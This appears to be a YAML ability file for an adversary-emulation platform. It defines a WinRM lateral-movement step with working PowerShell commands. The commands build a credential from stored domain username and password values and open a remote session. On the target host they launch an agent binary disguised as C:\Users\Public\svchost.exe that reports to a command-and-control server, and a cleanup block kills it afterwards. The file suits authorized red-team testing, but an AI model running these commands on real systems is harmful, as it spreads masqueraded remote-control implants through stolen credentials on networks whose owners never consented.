/
41bb2b7a-75af-49fd-bd15-6c827df25921.yml
33 lines (33 loc) · 1.69 KB
/
41bb2b7a-75af-49fd-bd15-6c827df25921.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
- id: 41bb2b7a-75af-49fd-bd15-6c827df25921
name: Start Agent (WinRM)
description: Start Agent using WinRM (WinRM)
tactic: lateral-movement
technique:
attack_id: T1021.006
name: "Remote Services: Windows Remote Management"
platforms:
windows:
psh:
command: |
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
cleanup: |
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{Get-Process cmd | Where-Object Path -eq C:\Users\Public\svchost.exe | Stop-Process}};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
payloads:
- sandcat.go-windows
singleton: True